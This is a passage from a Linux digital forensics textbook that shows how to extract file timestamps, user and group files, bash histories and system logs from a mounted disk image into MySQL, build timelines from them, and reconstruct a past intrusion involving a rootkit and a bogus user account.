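# Empty records in the middle of a table are skipped, not treated as the end.
records = ['root', '', 'home', '', '']      # stand-ins for parsed GPT entries
parts = []
for i in range(0, len(records)):
    if records[i]:                          # plays the role of "not p.empty"
        parts.append((i, records[i]))

print(parts)
```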

Once the entire GPT has been parsed we iterate over the parts list and attempt to mount any supported partitions. The methods used are the same as those from the previous mounting scripts. The results of running this script against an image using GUID partitions are shown in Figure 5.14. Note that this script was intentionally run without root privileges so that the mounts would fail as the image used was corrupted.

FIGURE 5.14

Mounting GUID-based partitions from an image file. Note: the script was intentionally run without root privileges to prevent mounting of an image that was corrupted.

SUMMARY

We have covered a lot of ground in this chapter. We discussed the basics of mounting different types of partitions found in image files. Some readers may have learned a little Python along the way as we discussed how Python could be used to automate this process. In the next chapter we will discuss investigating the filesystem(s) mounted from your disk image.

CHAPTER 6

Analyzing Mounted Images

INFORMATION IN THIS CHAPTER:

Getting metadata from an image
Using LibreOffice in an investigation
Using MySQL in an investigation
Creating timelines
Extracting bash histories
Extracting system logs
Extracting logins and login attempts

GETTING MODIFICATION, ACCESS, AND CREATION TIMESTAMPS

Now that you have an image mounted, the full set of Linux system tools is available to you. One of the first things you might want to do is create a timeline. At a minimum you will want to check all of the usual directories that attackers target such as /sbin and /bin. Naturally, we can still use some scripting to help with the process. The following script will extract modification, access, and creation (MAC) times and other metadata from a given directory and output the information in semicolon separated values for easy import into a spreadsheet or database.

#!/bin/bash
#
# getmacs.sh
#
# Simple shell script to extract MAC times from an image to
# a CSV file for import into a spreadsheet or database.
#
# Developed for PentesterAcademy by
# Dr. Phil Polstra (@ppolstra)

usage () {
    echo "usage: $0 <starting directory>"
    echo "Simple script to get MAC times from an image and output CSV"
    exit 1
}

if [ $# -lt 1 ] ; then
    usage
fi

# semicolon delimited file which makes import to spreadsheet easier
# printf is access date, access time, modify date, modify time,
# create date, create time (find's %C, the inode change time),
# permissions, user id, group id, file size, filename
# and then line feed
olddir=$(pwd)
cd "$1" # this avoids having the mount point added to every filename
printf "Access Date;Access Time;Modify Date;Modify Time;Create Date;\
Create Time;Permissions;User ID;Group ID;File Size;Filename\n"
find ./ -printf "%Ax;%AT;%Tx;%TT;%Cx;%CT;%m;%U;%G;%s;%p\n"
cd "$olddir"

The script is straightforward and contains no techniques that have not already been discussed in this book. The one thing you might be curious about is saving the current directory with olddir=$(pwd), changing to the specified directory, and then changing back with cd $olddir at the end. This is done to prevent the full path (including the mount point specified) from being added to the front of each filename in the output.
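For readers who would rather stay in Python, roughly the same rows can be produced with os.walk() and os.lstat(). This is a sketch under stated assumptions, not a replacement for getmacs.sh: the function name mac_rows is invented, the date format is fixed at month/day/year rather than taken from the locale, and unlike find the sketch does not emit a row for the starting directory itself.

```python
import os
import shutil
import tempfile
import time


def mac_rows(start_dir):
    """Yield one semicolon-separated metadata line per entry under start_dir."""
    for root, dirs, files in os.walk(start_dir):
        for name in dirs + files:
            full = os.path.join(root, name)
            st = os.lstat(full)                     # do not follow symlinks
            stamps = []
            for t in (st.st_atime, st.st_mtime, st.st_ctime):
                lt = time.localtime(t)
                stamps.append(time.strftime('%m/%d/%Y', lt))
                stamps.append(time.strftime('%H:%M:%S', lt))
            # paths are reported relative to start_dir, so no mount point
            rel = './' + os.path.relpath(full, start_dir)
            yield ';'.join(stamps + ['%o' % (st.st_mode & 0o7777),
                                     str(st.st_uid), str(st.st_gid),
                                     str(st.st_size), rel])


# Exercise the function on a scratch directory holding a single file.
workdir = tempfile.mkdtemp()
with open(os.path.join(workdir, 'evidence.txt'), 'w') as f:
    f.write('hello')
rows = list(mac_rows(workdir))
shutil.rmtree(workdir)
print(rows[0])
```

Computing paths relative to the starting directory plays the same role as the cd in the shell script.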

Partial results of running this script against a subject system are shown in Figure 6.1. Normally you will want to capture the results to a file using getmacs.sh {mount point of subject filesystem} > {output file}. For example, getmacs.sh /media/part0 > pfe1.csv.

FIGURE 6.1

Getting metadata for input to a spreadsheet or database.

IMPORTING INFORMATION INTO LIBREOFFICE

The output from the previous script is easily imported into LibreOffice Calc or another spreadsheet. Simply open the semicolon-separated file. You will need to specify what is used to separate the values (a semicolon for us) and should also select the format used for the date columns as shown in Figure 6.2.

FIGURE 6.2

Importing a semicolon-separated file into LibreOffice. Note that the date columns should be formatted as dates as shown.

The spreadsheet is easily sorted by any of the dates and times. To sort the spreadsheet select the columns to be sorted and then select sort from the data menu. You will be greeted with a screen such as that shown in Figure 6.3.

FIGURE 6.3

Sorting the spreadsheet by access times.

After we have sorted the spreadsheet it is much easier to see related activities, or at least the files that have been accessed around the same time, possibly related to actions by an attacker. The highlighted rows in Figure 6.4 show files from a rootkit, downloaded by the john account, being accessed.

FIGURE 6.4

After sorting the spreadsheet by access times the download and installation of a rootkit is easily seen.

IMPORTING DATA INTO MySQL

Importing our data into a spreadsheet is an easy process. It does suffer when it comes to performance if the subject filesystem is large, however. There is another limitation of this method as well. It is not easy to make a true timeline where modification, access, and creation times are all presented on a single timeline. You could create a body file for use with Autopsy, but I have found that the performance is still lacking and this is not nearly as flexible as having everything in a proper database.

If you do not already have MySQL installed on your forensics workstation, it is quite simple to add. For Debian and Ubuntu based systems sudo apt-get install mysql-server should be all you need. Once MySQL has been installed you will want to create a database. To keep things clean, I recommend you create a new database for each case. The command to create a new database is simply mysqladmin -u <user> -p create <database name>. For example, if I want to login as the root user (which is not necessarily the same as the root user on the system) and create a database for case-pfe1 I would type mysqladmin -u root -p create case-pfe1. The -p option means please prompt me for a password (passing it in on the command line would be very bad security as this could be intercepted easily). The user login information should have been set up when MySQL was installed.

Once a database has been created it is time to add some tables. The easiest way to do this is to start the MySQL client using mysql -u <user> -p, e.g. mysql -u root -p. You are not yet connected to your database. To remedy that situation issue the command connect <database> in the MySQL client shell. For example, in my case I would type connect case-pfe1. Logging in to MySQL and connecting to a database is shown in Figure 6.5.

FIGURE 6.5

Logging in with the MySQL client and connecting to a database.

The following SQL code will create a database table that can be used to import the semicolon-separated values in the file generated by our shell script. This script may be saved to a file and executed in the MySQL client. It is also just as easy to cut and paste it into MySQL.

create table files (
    AccessDate date not null,
    AccessTime time not null,
    ModifyDate date not null,
    ModifyTime time not null,
    CreateDate date not null,
    CreateTime time not null,
    Permissions smallint not null,
    UserId smallint not null,
    GroupId smallint not null,
    FileSize bigint not null,
    Filename varchar(2048) not null,
    recno bigint not null auto_increment,
    primary key(recno)
);

We can see that this is a fairly simple table. All of the columns are declared 'not null' meaning that they cannot be empty. For readers not familiar with MySQL the last two lines might require some explanation. The first creates a column, recno, which is a long integer and sets it to automatically increment an internal counter every time a new row is inserted. On the next line recno is set as the primary key. The primary key is used for sorting and quickly retrieving information in the table.

Creating this table is shown in Figure 6.6. Notice that MySQL reports 0 rows affected which is correct. Adding a table does not create any rows (records) in it.

FIGURE 6.6

Create a table to store file metadata in MySQL.

Now that there is a place for data to go, the information from our shell script can be imported. MySQL has a load data infile command that can be used for this purpose. There is a small complication that must be worked out before running this command. The date strings in the file must be converted to proper MySQL date objects before insertion in the database. This is what is happening in the set clause of the following script. There is also a line that reads ignore 1 rows which tells MySQL to ignore the headers at the top of our file that exist to make a spreadsheet import easier.

load data infile '/tmp/case-pfe1.csv'
into table files
fields terminated by ';'
enclosed by '"'
lines terminated by '\n'
ignore 1 rows
(@AccessDate, AccessTime, @ModifyDate, ModifyTime, @CreateDate,
 CreateTime, Permissions, UserId, GroupId, FileSize, Filename)
set AccessDate=str_to_date(@AccessDate, "%m/%d/%Y"),
    ModifyDate=str_to_date(@ModifyDate, "%m/%d/%Y"),
    CreateDate=str_to_date(@CreateDate, "%m/%d/%Y");

The file to be imported must be in an approved directory or MySQL will ignore it. This is a security measure. This would prevent, among other things, an attacker who exploits a SQL vulnerability on a website from uploading a file to be executed, assuming that MySQL won’t accept files from any directory accessible by the webserver. You could change the list of directories in the MySQL files, but it is probably simpler to just copy your file to /tmp for the import as I have done.

Loading file metadata from the PFE subject system is shown in Figure 6.7. Notice that my laptop was able to insert 184,601 rows in only 5.29 seconds. The warnings concern the date imports. As we shall see, all of the dates were properly imported.

FIGURE 6.7

Loading file metadata into MySQL.

Once the data is imported you are free to query your one table database to your heart’s content. For example, to get these 184,601 files sorted by access time in descending order (so the latest activity is on the top) simply run the query select * from files order by accessdate desc, accesstime desc;. The results of running this query are shown in Figure 6.8. Note that retrieving 184,601 sorted rows required a mere 0.71 seconds on my laptop. If you prefer an ascending sort just omit 'desc' in the SQL query above.

FIGURE 6.8

Using MySQL to sort file metadata by access time.

Astute readers may have noticed that our script imported user and group IDs, not names. This was intentional. Why did we do it this way? If you stop to think about it, it will occur to you that when you list files on your Linux machine using ls, the ls program is using the password file to translate user and group IDs stored in the inodes (more about these later in the book) to names. You have mounted a filesystem from another computer on your forensics workstation and ls will use your /etc/passwd and /etc/group files to translate IDs to names, not the correct files from the subject system. This issue is shown in Figure 6.9 where all of the john user’s files report that they belong to the phil user because the user ID for john on the subject system is the same as the user ID for phil on my forensics workstation. In cases where the user ID is not found on the forensics workstation the raw user ID is displayed rather than the incorrect name.

FIGURE 6.9

Usernames incorrectly displayed for a mounted subject filesystem.
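The translation that ls performs can be imitated with the subject system’s own password file instead of the workstation’s. The sketch below parses passwd-format text into a mapping from user ID to account names. The function name load_uid_map and the sample lines are made up for illustration and are not taken from the subject image.

```python
def load_uid_map(passwd_text):
    """Map each numeric user ID to the list of account names that use it."""
    uid_map = {}
    for line in passwd_text.splitlines():
        fields = line.split(':')
        if len(fields) < 7:
            continue                      # skip blank or malformed lines
        uid_map.setdefault(int(fields[2]), []).append(fields[0])
    return uid_map


# Hypothetical excerpt in /etc/passwd format.
sample = """root:x:0:0:root:/root:/bin/bash
alice:x:1000:1000:Alice,,,:/home/alice:/bin/bash
mallory:x:0:0::/home/mallory:/bin/bash
"""
uid_map = load_uid_map(sample)
print(uid_map.get(1000, ['1000']))
```

In practice the text would be read from the passwd file under the subject’s mount point, for example /media/part0/etc/passwd. Keeping a list of names per ID means an account that shares an ID with another is not silently hidden.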

We can easily display the correct user and group name in queries of our database if we create two new tables and import the /etc/passwd and /etc/group files from the subject system. This is straightforward thanks to the fact that these files are already colon delimited. Importing this information is as simple as copying the subject’s passwd and group files to /tmp (or some other directory MySQL has been configured to use for imports), and then running the following SQL script.

create table users (
    username varchar(255) not null,
    passwordHash varchar(255) not null,
    uid int not null,
    gid int not null,
    userInfo varchar(255) not null,
    homeDir varchar(255) not null,
    shell varchar(2048) not null,
    primary key (username)
);

load data infile '/tmp/passwd'
into table users
fields terminated by ':'
enclosed by '"'
lines terminated by '\n';

create table groups (
    groupname varchar(255) not null,
    passwordHash varchar(255) not null,
    gid int not null,
    userlist varchar(2048)
);

load data infile '/tmp/group'
into table groups
fields terminated by ':'
enclosed by '"'
lines terminated by '\n';

This code is a bit simpler than the import for our metadata file. The primary reason for this is that there are no dates or other complex objects to convert. You will note that I have used the username and not the user ID as the primary key for the users table. The reason for this is that if an attacker has added an account with a duplicate ID, the import would fail as primary keys must be unique. It is not unusual for an attacker to create a new account that shares an ID, especially ID 0 for the root user. Executing the script above to load these two tables is shown in Figure 6.10.

FIGURE 6.10

Importing user and group information into MySQL.

Now that the user information has been imported I can perform some simple queries. It might be useful to see what shells are being used for each user. An attacker might change the shell of system accounts to allow login. Such accounts normally have a login shell of /usr/sbin/nologin or /bin/false. The results of executing the query select * from users order by uid; are shown in Figure 6.11. The results show that an attacker has created a bogus johnn account.

FIGURE 6.11

Selecting users from the database. Note the bogus johnn account that has been created by an attacker.

If an attacker has reused a user ID, that is easily detected. In addition to looking at the results from the previous query in order to see everything in the users table sorted by user ID, another query will instantly let you know if duplicate IDs exist. The query select distinct uid from users; should return the same number of rows as the previous query (38 in the case of the subject system). If it returns anything less, then duplicates exist.
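The row-count comparison can be tried without a MySQL server by using Python’s built-in sqlite3 module, which is swapped in here purely so the example is self-contained. The table contents are made-up rows, and the final query, which lists the shared IDs together with the accounts that share them, is an addition for illustration rather than something from the text.

```python
import sqlite3

conn = sqlite3.connect(':memory:')
conn.execute('create table users (username text primary key, uid int not null)')
conn.executemany('insert into users values (?, ?)',
                 [('root', 0), ('daemon', 1), ('mallory', 0)])  # made-up rows

total = conn.execute('select count(*) from users').fetchone()[0]
distinct = conn.execute('select count(distinct uid) from users').fetchone()[0]
# List the IDs that are shared, and which accounts share them.
shared = conn.execute(
    'select uid, group_concat(username) from users '
    'group by uid having count(*) > 1').fetchall()
conn.close()

print(total, distinct, shared)
```

A distinct count that is lower than the total signals duplicates, and the grouped query shows exactly which accounts are involved.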

Is there any value in viewing the group file information? Yes. The group file contains a list of users who belong to each group. If an attacker has added himself/herself to a group, it will show up here. New users in the sudo, adm, or wheel groups, which are used to determine who gets root privileges (the exact group and mechanism vary from one Linux distribution to the next), are particularly interesting. Even knowing which legitimate users are in these groups can be helpful if you think an attacker has gained root access. The results of running the query select * from groups order by groupname; are shown in Figure 6.12. It would appear from this information that the john account has administrative privileges. The query select distinct gid from groups; should return the same number of rows if there are no duplicate group numbers.

FIGURE 6.12

Examining group file information.

Let's return to the files table. After all, we said our motivation for importing users and groups was to display correct information. In order to display usernames in our queries we must do a database join. If you are not a SQL expert, fear not, the kind of join needed here is simple. We need only select from more than one table and give the condition that joins (associates) rows in the various tables.

If we wish to add usernames to the previous query of the files table something like the following will work: select accessdate, accesstime, filename, permissions, username from files, users where files.userid=users.uid order by accessdate desc, accesstime desc. What have we changed? We have gone from the catchall select * to an explicit list of columns. A second table has been added to the from clause. Finally, we have a join clause, where files.userid=users.uid, that determines which row in the users table is used to retrieve the username. If any of the column names in the list exist in both tables you must prefix the column name with <table>. to tell MySQL which table to use. The results of running this query are shown in Figure 6.13.
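If you would like to experiment with this kind of join without touching your case database, the sketch here reproduces the idea with Python's built-in sqlite3 module. Note the assumptions: SQLite is swapped in for MySQL purely for convenience, the tables are cut down to a few columns, and the rows are invented.

```python
import sqlite3

# In-memory SQLite database standing in for the MySQL case database.
conn = sqlite3.connect(":memory:")
conn.executescript("""
create table users (username text primary key, uid int not null);
create table files (filename text, userid int, accessdate text, accesstime text);
insert into users values ('root', 0), ('john', 1000);
insert into files values
  ('/etc/passwd', 0, '2015-03-09', '21:30:00'),
  ('/home/john/notes.txt', 1000, '2015-03-10', '08:15:00');
""")

# Same shape as the query in the text: two tables in the from clause,
# joined by the condition files.userid = users.uid.
rows = conn.execute("""
    select accessdate, accesstime, filename, username
    from files, users
    where files.userid = users.uid
    order by accessdate desc, accesstime desc
""").fetchall()

for row in rows:
    print(row)
```

Each output row carries the username looked up through the join rather than the numeric ID stored in the files table.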

FIGURE 6.13

Results of running query on files table with usernames from users table.

Notice that Figure 6.13 shows a text file in gedit. Here we have used a useful feature of the MySQL client, the tee <logfile> command. This command is similar to the shell command with the same name in that it causes output to go both to the screen and also to a specified file. This allows all query output to be captured, which can be a useful thing to store in your case directory. When you no longer want to capture output the notee command will close the file and stop sending information. You might wish to tee everything to one big log file for all your queries or store queries in their own files, your choice. MySQL has shortcuts for many commands including \T and \t for tee and notee, respectively.

You may have noticed that I primarily like to use command line tools. I realize that not everyone shares my passion for command line programs. There is absolutely nothing stopping you from using the powerful MySQL techniques described in this book within phpMyAdmin, MySQL Workbench, or any other Graphical User Interface (GUI) tool.

Could you still do lots of forensics without using a database? Yes, you certainly could and people do. However, if you look at available tools such as Autopsy you will notice that they are relatively slow when you put them up against querying a proper database. There is another reason I prefer to import data into a database. Doing so is far more flexible. See the sidebar for a perfect example.

YOU CAN'T GET THERE FROM HERE

When tools fail you

I am reminded of a joke concerning a visitor to a large city who asked a local for directions. The local responded to the request for directions by saying "You can't get there from here." Sometimes that is the case when using prepackaged tools. They just don't do exactly what you want and there is no easy way to get them to conform to your will.

Recently in one of my forensics classes at the university where I teach there was a technical issue with one of the commercial tools we use. In an attempt to salvage the rest of my 75 minute class period I turned to Autopsy. It is far from being a bad tool and it has some nice features. One of the things it supports is filters. You can filter files by size, type, etc. What you cannot do, however, is combine these filters. This is just one simple example of something that is extremely easy with a database, but if you only have a prepackaged tool "You can't get there from here."

Based on our live analysis of the subject system from PFE, we know that the attack most likely occurred during the month of March. We also see that the john account was used in some way during the attack. As noted earlier in this chapter, this account has administrative privileges. We can combine these facts together to examine only files accessed and modified from March onwards that are owned by john or johnn (with user IDs of 1000 and 1001, respectively). All that is required is a few additions to the where clause in our query which now reads:

select accessdate, accesstime, filename, permissions, username from files, users where files.userid=users.uid and modifydate > date('2015-03-01') and accessdate > date('2015-03-01') and (files.userid=1000 or files.userid=1001) order by accessdate desc, accesstime desc;

We could have used the users table to match based on username, but it is a bit easier to filter on the user IDs; the join with the users table then serves only to display the username. This query ran in 0.13 seconds on my laptop and returned only 480 rows, a reduction of over 867,000 records. This allows you to eliminate the noise and home in on the relevant information such as that shown in Figure 6.14 and Figure 6.15.

FIGURE 6.14

Evidence of a rootkit download.

FIGURE 6.15

Evidence of logging into a bogus account. Note that the modified files for the john account suggest that the attacker initially logged in with this account, switched to the johnn account as a test, and then logged off.

CREATING A TIMELINE

As we said previously, making a proper timeline with access, modification, and creation times intertwined is not easy with a simple spreadsheet. It is quite easily done with our database, however. The shell script below (which is primarily just a SQL script) will create a new timeline table in the database. The timeline table will allow us to easily and quickly create timelines.

#!/bin/bash
#
# create-timeline.sh
#
# Simple shell script to create a timeline in the database.
#
# Developed for PentesterAcademy by
# Dr. Phil Polstra (@ppolstra)

usage () {
   echo "usage: $0 <database>"
   echo "Simple script to create a timeline in the database"
   exit 1
}

if [ $# -lt 1 ] ; then
   usage
fi

# feed everything up to EOF to the mysql client
cat << EOF | mysql $1 -u root -p
create table timeline (
   Operation char(1),
   Date date not null,
   Time time not null,
   recno bigint not null
);
insert into timeline (Operation, Date, Time, recno)
   select "A", accessdate, accesstime, recno from files;
insert into timeline (Operation, Date, Time, recno)
   select "M", modifydate, modifytime, recno from files;
insert into timeline (Operation, Date, Time, recno)
   select "C", createdate, createtime, recno from files;
EOF

There is one technique in this script that requires explaining as it has not been used thus far in this book. The relevant line is cat << EOF | mysql $1 -u root -p. This construct will cat (type out) everything from the following line until the string after << (which is 'EOF' in our case) is encountered. All of these lines are then piped to mysql which is run against the passed in database ($1) with user root who must supply a password.

Looking at the SQL in this script we see that a table is created that contains a one character operation code, date, time, and record number. After the table is created three insert statements are executed to insert access, modification, and creation timestamps into the table. Note that recno in the timeline table is the primary key from the files table. Now that we have a table with all three timestamps, a timeline can be quickly and easily created. This script ran in under two seconds on my laptop.
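To make the effect of the three insert statements concrete, here is a small Python sketch of the same transformation done in memory. It is an illustration only, not a replacement for the database approach: the function build_timeline and the sample record are hypothetical, and dates and times are assumed to be ISO formatted strings so that they sort correctly as text.

```python
def build_timeline(files):
    """Expand each file record into three (operation, date, time, recno) rows."""
    timeline = []
    for rec in files:
        timeline.append(("A", rec["accessdate"], rec["accesstime"], rec["recno"]))
        timeline.append(("M", rec["modifydate"], rec["modifytime"], rec["recno"]))
        timeline.append(("C", rec["createdate"], rec["createtime"], rec["recno"]))
    # ISO formatted date and time strings sort chronologically as plain text;
    # reverse=True puts the newest entries first.
    timeline.sort(key=lambda row: (row[1], row[2]), reverse=True)
    return timeline


# Hypothetical record; the field names mirror the columns used in the text.
sample = [{
    "recno": 1,
    "accessdate": "2015-03-09", "accesstime": "21:00:00",
    "modifydate": "2015-03-05", "modifytime": "23:00:08",
    "createdate": "2015-03-05", "createtime": "23:01:10",
}]

for entry in build_timeline(sample):
    print(entry)
```

One file record becomes three timeline rows, which is why the timeline table holds three times as many rows as the files table.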

For convenience I have created a shell script that accepts a database and a starting date and then builds a timeline. This script also uses the technique that was new in the last script. Note that you can change the format string for the str_to_date function in this script if you prefer something other than the standard US date format.

#!/bin/bash
#
# print-timeline.sh
#
# Simple shell script to print a timeline.
#
# Developed for PentesterAcademy by
# Dr. Phil Polstra (@ppolstra)

usage () {
   echo "usage: $0 <database> <starting date>"
   echo "Simple script to get timeline from the database"
   exit 1
}

if [ $# -lt 2 ] ; then
   usage
fi

# $2 is expanded by the shell before the SQL reaches mysql
cat << EOF | mysql $1 -u root -p
select Operation, timeline.date, timeline.time,
   filename, permissions, userid, groupid
   from files, timeline
   where timeline.date >= str_to_date("$2", "%m/%d/%Y") and
   files.recno = timeline.recno
   order by timeline.date desc, timeline.time desc;
EOF

At this point I should probably remind you that the timestamps in our timeline could have been altered by a sophisticated attacker. We will learn how to detect these alterations later in this book. Even an attacker that knows to alter these timestamps might miss a few files here and there that will give you insight into what has transpired.

The script above was run with a starting date of March 1, 2015. Recall from our live analysis that some commands such as netstat and lsof failed, which led us to believe the system might be infected with a rootkit. The highlighted section in Figure 6.16 shows the Xing Yi Quan rootkit was downloaded into the john user's Downloads directory at 23:00:08 on 2015-03-05. As can be observed in the highlighted portion of Figure 6.17, the compressed archive that was downloaded was extracted at 23:01:10 on the same day.

FIGURE 6.16

Evidence showing the download of a rootkit.

FIGURE 6.17

Evidence of a rootkit compressed archive being uncompressed.

It appears that the attacker logged off and did not return until March 9. At that time he or she seems to have read the rootkit README file using more and then built the rootkit. Evidence to support this can be found in Figure 6.18. It is unclear why the attacker waited several days before building and installing the rootkit. Looking at the README file on the target system suggests an inexperienced attacker. There were 266 matches for the search string "xingyi" in the timeline file. The rootkit appears to have been run repeatedly. This could have been due to a system crash, reboot, or attacker inexperience.

FIGURE 6.18

Evidence showing a rootkit being built and installed.

We have really just scratched the surface of what we can do with a couple of database tables full of metadata. You can make up queries to your heart's content. We will now move on to other common things you might wish to examine while your image is mounted.

EXAMINING BASH HISTORIES

During our live response we used a script to extract users' bash command histories. Here we will do something similar except that we will use the filesystem image. We will also optionally import the results directly into a database. The script to do all this follows.

#!/bin/bash
#
# get-histories.sh
#
# Simple script to get all user bash history files and
# optionally store them in a database.
# by Dr. Phil Polstra (@ppolstra) as developed for
# PentesterAcademy.com.

usage () {
   echo "usage: $0 <mount point of root> [database name]"
   echo "Simple script to get user histories and \
      optionally store them in the database"
   exit 1
}

if [ $# -lt 1 ] ; then
   usage
fi

# find only files, filename is .bash_history
# use awk to prefix every history line with the filename
olddir=$(pwd)
cd "$1"
find home -type f -regextype posix-extended \
   -regex "home/[a-zA-Z.]+(/.bash_history)" \
   -exec awk '{ print "{};" $0 }' {} \; \
   | tee /tmp/histories.csv
# repeat for the admin user
find root -type f -regextype posix-extended \
   -regex "root(/.bash_history)" \
   -exec awk '{ print "{};" $0 }' {} \; \
   | tee -a /tmp/histories.csv
cd "$olddir"

if [ $# -gt 1 ] ; then
   # let the MySQL server read the file
   chown mysql:mysql /tmp/histories.csv
   cat << EOF | mysql $2 -u root -p
create table if not exists histories (
   historyFilename varchar(2048) not null,
   historyCommand varchar(2048) not null,
   recno bigint not null auto_increment,
   primary key (recno)
);
load data infile "/tmp/histories.csv"
   into table histories
   fields terminated by ';'
   enclosed by '"'
   lines terminated by '\n';
EOF
fi

Back in Chapter 3, our live response script simply displayed a banner, typed out the history file contents, and displayed a footer. This will not work as a format if we wish to import the results into a spreadsheet and/or database. To get an output that is more easily imported we use awk.

Some readers may be unfamiliar with awk. It was created at Bell Labs in the 1970s by Alfred Aho, Peter Weinberger, and Brian Kernighan. Its name comes from the first letters of the authors' surnames. Awk is a text processing language. The most common use of awk in scripts is the printing of positional fields in a line of text.

Simple awk usage is best learned by examples. For example, the command echo "one two three" | awk '{ print $1 $3 }' will print "onethree". By default fields are separated by whitespace in awk. The three -exec clauses for the find command in the script presented in Chapter 3 have been replaced with the single clause -exec awk '{ print "{};" $0 }' {} \;. The $0 in this awk command refers to an entire line. For every line in the file, this prints the filename, a semicolon, and then the line itself.
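For readers who think more easily in Python than in awk, the following sketch mimics what that single awk clause produces. The helper name prefix_lines and the sample history text are hypothetical; the real script works on the files that find locates.

```python
def prefix_lines(filename, text):
    """Mimic awk '{ print "<filename>;" $0 }': one 'filename;line' row per input line."""
    return [f"{filename};{line}" for line in text.splitlines()]


# Hypothetical history contents for illustration only.
history = "w\ncat /etc/passwd\n"

for row in prefix_lines("home/john/.bash_history", history):
    print(row)
```

Because every row starts with the name of the file it came from, a single CSV file can hold the histories of all users and still be queried per user after import.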

The database code is new if we compare this script to the similar one in Chapter 3. It is also straightforward and uses techniques previously discussed. Another thing that is done in this script is to change the owner and group of the output histories.csv file to mysql. This is done to avoid any complications loading the file into the database. Partial results from running this script against our PFE subject system are shown in Figure 6.19.

FIGURE 6.19

Extracting bash command histories from the image file.

Once the histories are loaded in the database they are easily displayed using select * from histories order by recno. This will give all user histories. Realize that each account's history will be presented in order for that user, but there is no way to tell when any of these commands were executed. The proper query to display bash history for a single user is select historyCommand from histories where historyFilename like '%<username>%' order by recno;.

The results of running the query select historyCommand from histories where historyFilename like '%.johnn%' order by recno; are shown in Figure 6.20. From this history we can see the bogus johnn user ran w to see who else was logged in and what command they last executed, typed out the password file, and switched to two user accounts that should not have login privileges.

FIGURE 6.20

Bash command history for a bogus account created by an attacker. Note that the commands being run are also suspicious.

Several interesting commands from the john account's bash history are shown in Figure 6.21. It can be seen that this user created the johnn account, copied /bin/true to /bin/false, created passwords for whoopsie and lightdm, copied /bin/bash to /bin/false, edited the group file, moved the johnn user's home directory from /home/johnn to /home/.johnn (which made the directory hidden), edited the password file, displayed the man page for sed, used sed to modify the password file, and installed a rootkit. Copying /bin/bash to /bin/false was likely done to allow system accounts to log in. This might also be one source of the constant "System problem detected" popup messages.

FIGURE 6.21

Evidence of multiple actions by an attacker using the john account.

EXAMINING SYSTEM LOGS

We might want to have a look at various system log files as part of our investigation. These files are located under /var/log. As we discussed previously, some of these logs are in subdirectories and others in the main /var/log directory. With a few exceptions these are text logs. Some have archives of the form <base log file>.n, where n is an integer, and older archives may be compressed with gzip. This leads to log files such as syslog, syslog.1, syslog.2.gz, syslog.3.gz, etc. being created.
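The naming scheme just described is regular enough to test for mechanically. The Python sketch here sorts log names into current, archived, and compressed; the function name classify_log is my own, and it assumes the <base log file>.n and <base log file>.n.gz patterns described above rather than every rotation scheme in use.

```python
import re


def classify_log(name):
    """Return 'current', 'archived', or 'compressed' for a log filename."""
    if re.search(r"\.\d+\.gz$", name):
        return "compressed"   # e.g. syslog.2.gz
    if re.search(r"\.\d+$", name):
        return "archived"     # e.g. syslog.1
    return "current"          # e.g. syslog or apt/history.log


for name in ["syslog", "syslog.1", "syslog.2.gz", "apt/history.log"]:
    print(name, classify_log(name))
```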

A script very similar to one from Chapter 3 allows us to capture log files for our analysis. As with the script from the earlier chapter, we will only capture the current log. If it appears that archived logs might be relevant to the investigation they can always be obtained from the image later. Our script follows.

#!/bin/bash
#
# get-logfiles.sh
#
# Simple script to get all logs and optionally
# store them in a database.
# Warning: This script might take a long time to run!
# by Dr. Phil Polstra (@ppolstra) as developed for
# PentesterAcademy.com.

usage () {
   echo "usage: $0 <mount point of root> [database name]"
   echo "Simple script to get log files and"
   echo "optionally store them to a database."
   exit 1
}

if [ $# -lt 1 ] ; then
   usage
fi

# remove old file if it exists
if [ -f /tmp/logfiles.csv ] ; then
   rm /tmp/logfiles.csv
fi

# find only files, exclude files with numbers as they are old logs
# use awk to prefix every log line with the filename
olddir=$(pwd)
cd "$1/var"
find log -type f -regextype posix-extended \
   -regex 'log/[a-zA-Z.]+(/[a-zA-Z.]+)*' \
   -exec awk '{ print "{};" $0 }' {} \; \
   | tee -a /tmp/logfiles.csv
cd "$olddir"

if [ $# -gt 1 ] ; then
   chown mysql:mysql /tmp/logfiles.csv
   clear
   echo "Let's put that in the database"
   cat << EOF | mysql $2 -u root -p
create table if not exists logs (
   logFilename varchar(2048) not null,
   logentry varchar(2048) not null,
   recno bigint not null auto_increment,
   primary key (recno)
);
load data infile "/tmp/logfiles.csv"
   into table logs
   fields terminated by ';'
   enclosed by '"'
   lines terminated by '\n';
EOF
fi

There are no techniques used in this script that have not been discussed earlier in this book. Running this against the PFE subject system yields 74,832 entries in our database in 32 log files. Some of these results are shown in Figure 6.22.

FIGURE 6.22

Partial results of importing log files into the database.

Recall that these logs fall into three basic categories. Some have absolutely no time information, others give seconds since boot, while others give proper dates and times. Because of this it is normally not possible to build a timeline of log entries. The general syntax for a query of a single log file is select logentry from logs where logfilename like '%<log file>%' order by recno;, e.g. select logentry from logs where logfilename like '%auth%' order by recno;. Partial results from this query are shown in Figure 6.23. Notice that the creation of the bogus johnn user and modifications to the lightdm and whoopsie accounts are clearly shown in this screenshot.

FIGURE 6.23

Evidence of the attacker's actions from log files.

If you are uncertain what logs have been imported, the query select distinct logfilename from logs; will list all of the log files captured. If you are not sure what kind of information is in a particular log, run a query. One of the nice things about this method is that it is so quick and easy to look at any of the logs without having to navigate a maze of directories.

Several of these logs, such as apt/history.log, apt/term.log, and dpkg.log, provide information on what has been installed via standard methods. It is quite possible that even a savvy attacker might not clean their tracks in all of the relevant log files. It is certainly worth a few minutes of your time to browse through a sampling of these logs.

EXAMINING LOGINS AND LOGIN ATTEMPTS

As discussed in the previous section, most of the system logs are text files. Two exceptions to this norm are the btmp and wtmp binary files which store failed logins and login session information, respectively. Earlier in this book, when we were talking about live response, we introduced the last and lastb commands which display information from wtmp and btmp, respectively.

Like all good Linux utilities, these two commands support a number of command line options. The command last -Faiwx will print full login and logout times (-F), place the remote host in the last column (-a), show that host as an IP address (-i), use the wide format (-w), and include extra information (-x), such as when a user changed the run level. Running this command will provide information contained within the current wtmp file only. What if you want to view older information, perhaps because the current file is only a couple days old? For this and other reasons, last allows you to specify a file using the -f option.

The results of running last against the current and most recent archive wtmp are shown in Figure 6.24. This is a good example of why you should look at the archived wtmp (and btmp) files as well. The current wtmp file contains only three days of information, but the archive file has an additional month of data.

FIGURE 6.24

Running the last command on the current and most recent archive wtmp files.

